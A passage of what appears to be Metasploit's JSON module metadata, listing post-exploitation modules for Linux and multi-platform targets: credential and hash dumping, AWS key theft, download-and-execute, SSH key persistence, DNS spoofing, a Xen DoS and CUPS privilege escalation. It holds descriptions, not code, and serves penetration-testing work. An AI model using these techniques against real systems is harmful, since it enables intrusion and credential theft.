"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_linux/busybox/enum_connections": {
"name": "BusyBox Enumerate Connections",
"full_name": "post/linux/busybox/enum_connections",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Javier Vicente Vallejo"
],
"description": "This module will be applied on a session connected to a BusyBox shell. It will\n enumerate the connections established with the router or device executing BusyBox.",
"references": [
],
"platform": "Linux",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/linux/busybox/enum_connections.rb",
"is_install_path": true,
"ref_name": "linux/busybox/enum_connections",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_linux/busybox/enum_hosts": {
"name": "BusyBox Enumerate Host Names",
"full_name": "post/linux/busybox/enum_hosts",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Javier Vicente Vallejo"
],
"description": "This module will be applied on a session connected to a BusyBox shell. It will enumerate\n host names related to the device executing BusyBox.",
"references": [
],
"platform": "Linux",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/linux/busybox/enum_hosts.rb",
"is_install_path": true,
"ref_name": "linux/busybox/enum_hosts",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_linux/busybox/jailbreak": {
"name": "BusyBox Jailbreak",
"full_name": "post/linux/busybox/jailbreak",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Javier Vicente Vallejo"
],
"description": "This module will send a set of commands to an open session that is connected to a\n BusyBox limited shell (i.e. a router limited shell). It will try different known\n tricks to jailbreak the limited shell and get a full BusyBox shell.",
"references": [
],
"platform": "Linux",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-09-17 16:00:04 +0000",
"path": "/modules/post/linux/busybox/jailbreak.rb",
"is_install_path": true,
"ref_name": "linux/busybox/jailbreak",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_linux/busybox/ping_net": {
"name": "BusyBox Ping Network Enumeration",
"full_name": "post/linux/busybox/ping_net",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Javier Vicente Vallejo"
],
"description": "This module will be applied on a session connected to a BusyBox shell. It will ping a range\n of IP addresses from the router or device executing BusyBox.",
"references": [
],
"platform": "Linux",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/linux/busybox/ping_net.rb",
"is_install_path": true,
"ref_name": "linux/busybox/ping_net",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_linux/busybox/set_dmz": {
"name": "BusyBox DMZ Configuration",
"full_name": "post/linux/busybox/set_dmz",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Javier Vicente Vallejo"
],
"description": "This module will be applied on a session connected to a BusyBox shell. It allows managing\n traffic forwarding to a target host through the BusyBox device.",
"references": [
],
"platform": "Linux",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/linux/busybox/set_dmz.rb",
"is_install_path": true,
"ref_name": "linux/busybox/set_dmz",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_linux/busybox/set_dns": {
"name": "BusyBox DNS Configuration",
"full_name": "post/linux/busybox/set_dns",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Javier Vicente Vallejo"
],
"description": "This module will be applied on a session connected to a BusyBox shell. It allows\n to set the DNS server on the device executing BusyBox so it will be sent by the\n DHCP server to network hosts.",
"references": [
],
"platform": "Linux",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/linux/busybox/set_dns.rb",
"is_install_path": true,
"ref_name": "linux/busybox/set_dns",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_linux/busybox/smb_share_root": {
"name": "BusyBox SMB Sharing",
"full_name": "post/linux/busybox/smb_share_root",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Javier Vicente Vallejo"
],
"description": "This module will be applied on a session connected to a BusyBox shell. It will modify\n the SMB configuration of the device executing BusyBox to share the root directory of\n the device.",
"references": [
],
"platform": "Linux",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/linux/busybox/smb_share_root.rb",
"is_install_path": true,
"ref_name": "linux/busybox/smb_share_root",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_linux/busybox/wget_exec": {
"name": "BusyBox Download and Execute",
"full_name": "post/linux/busybox/wget_exec",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Javier Vicente Vallejo"
],
"description": "This module will be applied on a session connected to a BusyBox shell. It will use wget to\n download and execute a file from the device running BusyBox.",
"references": [
],
"platform": "Linux",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/linux/busybox/wget_exec.rb",
"is_install_path": true,
"ref_name": "linux/busybox/wget_exec",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_linux/dos/xen_420_dos": {
"name": "Linux DoS Xen 4.2.0 2012-5525",
"full_name": "post/linux/dos/xen_420_dos",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Christoph Sendner <christoph.sendner@stud-mail.uni-wuerzburg.de>",
"Aleksandar Milenkoski <aleksandar.milenkoski@uni-wuerzburg.de>"
],
"description": "This module causes a hypervisor crash in Xen 4.2.0 when invoked from a\n paravirtualized VM, including from dom0. Successfully tested on Debian 7\n 3.2.0-4-amd64 with Xen 4.2.0.",
"references": [
"CVE-2012-5525"
],
"platform": "Linux",
"arch": "x64",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-09-17 16:00:04 +0000",
"path": "/modules/post/linux/dos/xen_420_dos.rb",
"is_install_path": true,
"ref_name": "linux/dos/xen_420_dos",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_linux/gather/checkcontainer": {
"name": "Linux Gather Container Detection",
"full_name": "post/linux/gather/checkcontainer",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"James Otten <jamesotten1@gmail.com>"
],
"description": "This module attempts to determine whether the system is running\n inside of a container and if so, which one. This module supports\n detection of Docker, LXC, and systemd nspawn.",
"references": [
],
"platform": "Linux",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-08-06 00:46:09 +0000",
"path": "/modules/post/linux/gather/checkcontainer.rb",
"is_install_path": true,
"ref_name": "linux/gather/checkcontainer",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_linux/gather/checkvm": {
"name": "Linux Gather Virtual Environment Detection",
"full_name": "post/linux/gather/checkvm",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Carlos Perez <carlos_perez@darkoperator.com>"
],
"description": "This module attempts to determine whether the system is running\n inside of a virtual environment and if so, which one. This\n module supports detection of Hyper-V, VMWare, VirtualBox, Xen,\n and QEMU/KVM.",
"references": [
],
"platform": "Linux",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-08-04 19:12:27 +0000",
"path": "/modules/post/linux/gather/checkvm.rb",
"is_install_path": true,
"ref_name": "linux/gather/checkvm",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_linux/gather/ecryptfs_creds": {
"name": "Gather eCryptfs Metadata",
"full_name": "post/linux/gather/ecryptfs_creds",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Dhiru Kholia <dhiru@openwall.com>"
],
"description": "This module will collect the contents of all users' .ecrypts directories on\n the targeted machine. Collected \"wrapped-passphrase\" files can be\n cracked with John the Ripper (JtR) to recover \"mount passphrases\".",
"references": [
],
"platform": "Linux",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/linux/gather/ecryptfs_creds.rb",
"is_install_path": true,
"ref_name": "linux/gather/ecryptfs_creds",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_linux/gather/enum_commands": {
"name": "Testing commands needed in a function",
"full_name": "post/linux/gather/enum_commands",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Alberto Rafael Rodriguez Iglesias <albertocysec@gmail.com>"
],
"description": "This module will be applied on a session connected to a shell. It will check which commands are available in the system.",
"references": [
],
"platform": "Linux",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2019-01-24 11:22:19 +0000",
"path": "/modules/post/linux/gather/enum_commands.rb",
"is_install_path": true,
"ref_name": "linux/gather/enum_commands",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_linux/gather/enum_configs": {
"name": "Linux Gather Configurations",
"full_name": "post/linux/gather/enum_configs",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"ohdae <bindshell@live.com>"
],
"description": "This module collects configuration files found on commonly installed\n applications and services, such as Apache, MySQL, Samba, Sendmail, etc.\n If a config file is found in its default path, the module will assume\n that is the file we want.",
"references": [
],
"platform": "Linux",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-12-06 13:06:50 +0000",
"path": "/modules/post/linux/gather/enum_configs.rb",
"is_install_path": true,
"ref_name": "linux/gather/enum_configs",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_linux/gather/enum_network": {
"name": "Linux Gather Network Information",
"full_name": "post/linux/gather/enum_network",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"ohdae <bindshell@live.com>",
"Stephen Haywood <averagesecurityguy@gmail.com>"
],
"description": "This module gathers network information from the target system\n IPTables rules, interfaces, wireless information, open and listening\n ports, active network connections, DNS information and SSH information.",
"references": [
],
"platform": "Linux",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-05-30 15:32:04 +0000",
"path": "/modules/post/linux/gather/enum_network.rb",
"is_install_path": true,
"ref_name": "linux/gather/enum_network",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_linux/gather/enum_protections": {
"name": "Linux Gather Protection Enumeration",
"full_name": "post/linux/gather/enum_protections",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"ohdae <bindshell@live.com>"
],
"description": "This module checks whether popular system hardening mechanisms are\n in place, such as SMEP, SMAP, SELinux, PaX and grsecurity. It also\n tries to find installed applications that can be used to hinder,\n prevent, or detect attacks, such as tripwire, snort, and apparmor.\n\n This module is meant to identify Linux Secure Modules (LSM) in addition\n to various antivirus, IDS/IPS, firewalls, sandboxes and other security\n related software.",
"references": [
],
"platform": "Linux",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-12-07 14:42:16 +0000",
"path": "/modules/post/linux/gather/enum_protections.rb",
"is_install_path": true,
"ref_name": "linux/gather/enum_protections",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_linux/gather/enum_psk": {
"name": "Linux Gather 802-11-Wireless-Security Credentials",
"full_name": "post/linux/gather/enum_psk",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Cenk Kalpakoglu"
],
"description": "This module collects 802-11-Wireless-Security credentials such as\n Access-Point name and Pre-Shared-Key from your target CLIENT Linux\n machine using /etc/NetworkManager/system-connections/ files.\n The module gathers NetworkManager's plaintext \"psk\" information.",
"references": [
],
"platform": "Linux",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/linux/gather/enum_psk.rb",
"is_install_path": true,
"ref_name": "linux/gather/enum_psk",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_linux/gather/enum_system": {
"name": "Linux Gather System and User Information",
"full_name": "post/linux/gather/enum_system",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Carlos Perez <carlos_perez@darkoperator.com>",
"Stephen Haywood <averagesecurityguy@gmail.com>",
"sinn3r <sinn3r@metasploit.com>",
"ohdae <bindshell@live.com>",
"Roberto Espreto <robertoespreto@gmail.com>"
],
"description": "This module gathers system information. We collect\n installed packages, installed services, mount information,\n user list, user bash history and cron jobs",
"references": [
],
"platform": "Linux",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/linux/gather/enum_system.rb",
"is_install_path": true,
"ref_name": "linux/gather/enum_system",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_linux/gather/enum_users_history": {
"name": "Linux Gather User History",
"full_name": "post/linux/gather/enum_users_history",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"ohdae <bindshell@live.com>"
],
"description": "This module gathers the following user-specific information:\n shell history, MySQL history, PostgreSQL history, MongoDB history,\n Vim history, lastlog, and sudoers.",
"references": [
],
"platform": "Linux",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/linux/gather/enum_users_history.rb",
"is_install_path": true,
"ref_name": "linux/gather/enum_users_history",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_linux/gather/enum_xchat": {
"name": "Linux Gather XChat Enumeration",
"full_name": "post/linux/gather/enum_xchat",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module will collect XChat's config files and chat logs from the victim's\n machine. There are three actions you may choose: CONFIGS, CHATS, and ALL. The\n CONFIGS option can be used to collect information such as channel settings,\n channel/server passwords, etc. The CHATS option will simply download all the\n .log files.",
"references": [
],
"platform": "Linux",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/linux/gather/enum_xchat.rb",
"is_install_path": true,
"ref_name": "linux/gather/enum_xchat",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_linux/gather/gnome_commander_creds": {
"name": "Linux Gather Gnome-Commander Creds",
"full_name": "post/linux/gather/gnome_commander_creds",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"David Bloom"
],
"description": "This module collects the clear text passwords stored by\n Gnome-commander, a GUI file explorer for GNOME. Typically, these\n passwords are stored in the user's home directory, at\n ~/.gnome-commander/connections.",
"references": [
],
"platform": "Linux",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/linux/gather/gnome_commander_creds.rb",
"is_install_path": true,
"ref_name": "linux/gather/gnome_commander_creds",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_linux/gather/gnome_keyring_dump": {
"name": "Gnome-Keyring Dump",
"full_name": "post/linux/gather/gnome_keyring_dump",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Spencer McIntyre"
],
"description": "Use libgnome-keyring to extract network passwords for the current user.\n This module does not require root privileges to run.",
"references": [
],
"platform": "Linux",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/linux/gather/gnome_keyring_dump.rb",
"is_install_path": true,
"ref_name": "linux/gather/gnome_keyring_dump",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_linux/gather/hashdump": {
"name": "Linux Gather Dump Password Hashes for Linux Systems",
"full_name": "post/linux/gather/hashdump",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Carlos Perez <carlos_perez@darkoperator.com>"
],
"description": "Post Module to dump the password hashes for all users on a Linux System",
"references": [
],
"platform": "Linux",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2019-03-23 14:02:34 +0000",
"path": "/modules/post/linux/gather/hashdump.rb",
"is_install_path": true,
"ref_name": "linux/gather/hashdump",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_linux/gather/mount_cifs_creds": {
"name": "Linux Gather Saved mount.cifs/mount.smbfs Credentials",
"full_name": "post/linux/gather/mount_cifs_creds",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Jon Hart <jhart@spoofed.org>"
],
"description": "Post Module to obtain credentials saved for mount.cifs/mount.smbfs in\n /etc/fstab on a Linux system.",
"references": [
],
"platform": "Linux",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-09-29 22:34:38 +0000",
"path": "/modules/post/linux/gather/mount_cifs_creds.rb",
"is_install_path": true,
"ref_name": "linux/gather/mount_cifs_creds",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_linux/gather/openvpn_credentials": {
"name": "OpenVPN Gather Credentials",
"full_name": "post/linux/gather/openvpn_credentials",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"rvrsh3ll",
"Roberto Soares Espreto <robertoespreto@gmail.com>"
],
"description": "This module grab OpenVPN credentials from a running process\n in Linux.\n\n Note: --auth-nocache must not be set in the OpenVPN command line.",
"references": [
"URL-https://gist.github.com/rvrsh3ll/cc93a0e05e4f7145c9eb#file-openvpnscraper-sh"
],
"platform": "Linux",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/linux/gather/openvpn_credentials.rb",
"is_install_path": true,
"ref_name": "linux/gather/openvpn_credentials",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_linux/gather/phpmyadmin_credsteal": {
"name": "Phpmyadmin credentials stealer",
"full_name": "post/linux/gather/phpmyadmin_credsteal",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Chaitanya Haritash [bofheaded]",
"Dhiraj Mishra <dhiraj@notsosecure.com>"
],
"description": "This module gathers Phpmyadmin creds from target linux machine.",
"references": [
],
"platform": "Linux",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-09-07 11:13:09 +0000",
"path": "/modules/post/linux/gather/phpmyadmin_credsteal.rb",
"is_install_path": true,
"ref_name": "linux/gather/phpmyadmin_credsteal",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_linux/gather/pptpd_chap_secrets": {
"name": "Linux Gather PPTP VPN chap-secrets Credentials",
"full_name": "post/linux/gather/pptpd_chap_secrets",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module collects PPTP VPN information such as client, server, password,\n and IP from your target server's chap-secrets file.",
"references": [
],
"platform": "Linux",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-06-12 17:11:29 +0000",
"path": "/modules/post/linux/gather/pptpd_chap_secrets.rb",
"is_install_path": true,
"ref_name": "linux/gather/pptpd_chap_secrets",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_linux/gather/tor_hiddenservices": {
"name": "Linux Gather TOR Hidden Services",
"full_name": "post/linux/gather/tor_hiddenservices",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Harvey Phillips <xcellerator@gmx.com>"
],
"description": "This module collects the hostnames name and private keys of\n any TOR Hidden Services running on the target machine. It\n will search for torrc and if found, will parse it for the\n directories of Hidden Services. However, root permissions\n are required to read them as they are owned by the user that\n TOR runs as, usually a separate account.",
"references": [
],
"platform": "Linux",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-06-07 20:08:23 +0000",
"path": "/modules/post/linux/gather/tor_hiddenservices.rb",
"is_install_path": true,
"ref_name": "linux/gather/tor_hiddenservices",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_linux/manage/dns_spoofing": {
"name": "Native DNS Spoofing module",
"full_name": "post/linux/manage/dns_spoofing",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Alberto Rafael Rodriguez Iglesias <albertocysec@gmail.com>"
],
"description": "This module will be applied on a session connected to a shell. It will redirect DNS Request to remote DNS server.",
"references": [
],
"platform": "Linux",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2019-01-24 11:22:19 +0000",
"path": "/modules/post/linux/manage/dns_spoofing.rb",
"is_install_path": true,
"ref_name": "linux/manage/dns_spoofing",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_linux/manage/download_exec": {
"name": "Linux Manage Download and Execute",
"full_name": "post/linux/manage/download_exec",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Joshua D. Abraham <jabra@praetorian.com>"
],
"description": "This module downloads and runs a file with bash. It first tries to uses curl as\n its HTTP client and then wget if it's not found. Bash found in the PATH is used\n to execute the file.",
"references": [
],
"platform": "Linux",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/linux/manage/download_exec.rb",
"is_install_path": true,
"ref_name": "linux/manage/download_exec",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_linux/manage/iptables_removal": {
"name": "IPTABLES rules removal",
"full_name": "post/linux/manage/iptables_removal",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Alberto Rafael Rodriguez Iglesias <albertocysec@gmail.com>"
],
"description": "This module will be applied on a session connected to a shell. It will remove all IPTABLES rules.",
"references": [
],
"platform": "Linux",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2019-01-24 11:22:19 +0000",
"path": "/modules/post/linux/manage/iptables_removal.rb",
"is_install_path": true,
"ref_name": "linux/manage/iptables_removal",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_linux/manage/pseudo_shell": {
"name": "Pseudo-Shell Post-Exploitation Module",
"full_name": "post/linux/manage/pseudo_shell",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Alberto Rafael Rodriguez Iglesias <albertocysec@gmail.com>"
],
"description": "This module will run a Pseudo-Shell.",
"references": [
],
"platform": "Linux",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2019-01-24 11:22:19 +0000",
"path": "/modules/post/linux/manage/pseudo_shell.rb",
"is_install_path": true,
"ref_name": "linux/manage/pseudo_shell",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_linux/manage/sshkey_persistence": {
"name": "SSH Key Persistence",
"full_name": "post/linux/manage/sshkey_persistence",
"rank": 600,
"disclosure_date": null,
"type": "post",
"author": [
"h00die <mike@shorebreaksecurity.com>"
],
"description": "This module will add an SSH key to a specified user (or all), to allow\n remote login via SSH at any time.",
"references": [
],
"platform": "Linux",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/linux/manage/sshkey_persistence.rb",
"is_install_path": true,
"ref_name": "linux/manage/sshkey_persistence",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_multi/escalate/aws_create_iam_user": {
"name": "Create an AWS IAM User",
"full_name": "post/multi/escalate/aws_create_iam_user",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Javier Godinez <godinezj@gmail.com>",
"Jon Hart <jon_hart@rapid7.com>"
],
"description": "This module will attempt to create an AWS (Amazon Web Services) IAM\n (Identity and Access Management) user with Admin privileges.",
"references": [
"URL-https://github.com/devsecops/bootcamp/raw/master/Week-6/slides/june-DSO-bootcamp-week-six-lesson-three.pdf"
],
"platform": "Unix",
"arch": "",
"rport": 443,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/multi/escalate/aws_create_iam_user.rb",
"is_install_path": true,
"ref_name": "multi/escalate/aws_create_iam_user",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_multi/escalate/cups_root_file_read": {
"name": "CUPS 1.6.1 Root File Read",
"full_name": "post/multi/escalate/cups_root_file_read",
"rank": 300,
"disclosure_date": "2012-11-20",
"type": "post",
"author": [
"Jann Horn",
"joev <joev@metasploit.com>"
],
"description": "This module exploits a vulnerability in CUPS < 1.6.2, an open source printing system.\n CUPS allows members of the lpadmin group to make changes to the cupsd.conf\n configuration, which can specify an Error Log path. When the user visits the\n Error Log page in the web interface, the cupsd daemon (running with setuid root)\n reads the Error Log path and echoes it as plaintext.\n\n This module is known to work on Mac OS X < 10.8.4 and Ubuntu Desktop <= 12.0.4\n as long as the session is in the lpadmin group.\n\n Warning: if the user has set up a custom path to the CUPS error log,\n this module might fail to reset that path correctly. You can specify\n a custom error log path with the ERROR_LOG datastore option.",
"references": [
"CVE-2012-5519",
"OSVDB-87635",
"URL-http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=692791"
],
"platform": "Linux,OSX",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-12-18 17:38:33 +0000",
"path": "/modules/post/multi/escalate/cups_root_file_read.rb",
"is_install_path": true,
"ref_name": "multi/escalate/cups_root_file_read",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_multi/escalate/metasploit_pcaplog": {
"name": "Multi Escalate Metasploit pcap_log Local Privilege Escalation",
"full_name": "post/multi/escalate/metasploit_pcaplog",
"rank": 0,
"disclosure_date": "2012-07-16",
"type": "post",
"author": [
"0a29406d9794e4f9b30b3c5d6702c708"
],
"description": "Metasploit < 4.4 contains a vulnerable 'pcap_log' plugin which, when used with the default settings,\n creates pcap files in /tmp with predictable file names. This exploits this by hard-linking these\n filenames to /etc/passwd, then sending a packet with a privileged user entry contained within.\n This, and all the other packets, are appended to /etc/passwd.\n\n Successful exploitation results in the creation of a new superuser account.\n\n This module requires manual clean-up. Upon success, you should remove /tmp/msf3-session*pcap\n files and truncate /etc/passwd. Note that if this module fails, you can potentially induce\n a permanent DoS on the target by corrupting the /etc/passwd file.",
"references": [
"BID-54472",
"URL-http://0a29.blogspot.com/2012/07/0a29-12-2-metasploit-pcaplog-plugin.html",
"URL-https://community.rapid7.com/docs/DOC-1946"
],
"platform": "BSD,Linux,Unix",
"arch": "",
"rport": 2940,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-09-30 15:45:52 +0000",
"path": "/modules/post/multi/escalate/metasploit_pcaplog.rb",
"is_install_path": true,
"ref_name": "multi/escalate/metasploit_pcaplog",
"check": false,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"post_multi/gather/apple_ios_backup": {
"name": "Windows Gather Apple iOS MobileSync Backup File Collection",
"full_name": "post/multi/gather/apple_ios_backup",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"hdm <x@hdm.io>",
"bannedit <bannedit@metasploit.com>"
],
"description": "This module will collect sensitive files from any on-disk iOS device backups",
"references": [
],
"platform": "OSX,Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/multi/gather/apple_ios_backup.rb",
"is_install_path": true,
"ref_name": "multi/gather/apple_ios_backup",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_multi/gather/aws_ec2_instance_metadata": {
"name": "Gather AWS EC2 Instance Metadata",
"full_name": "post/multi/gather/aws_ec2_instance_metadata",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Jon Hart <jon_hart@rapid7.com>"
],
"description": "This module will attempt to connect to the AWS EC2 instance metadata service\n and crawl and collect all metadata known about the session'd host.",
"references": [
"URL-http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html"
],
"platform": "Unix",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-08-02 15:55:24 +0000",
"path": "/modules/post/multi/gather/aws_ec2_instance_metadata.rb",
"is_install_path": true,
"ref_name": "multi/gather/aws_ec2_instance_metadata",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_multi/gather/aws_keys": {
"name": "UNIX Gather AWS Keys",
"full_name": "post/multi/gather/aws_keys",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Jon Hart <jon_hart@rapid7.com>"
],
"description": "This module will attempt to read AWS configuration files\n (.aws/config, .aws//credentials and .s3cfg) for users discovered\n on the session'd system and extract AWS keys from within.",
"references": [
"URL-http://s3tools.org/kb/item14.htm",
"URL-http://docs.aws.amazon.com/cli/latest/userguide/cli-chap-getting-started.html#cli-config-files"
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
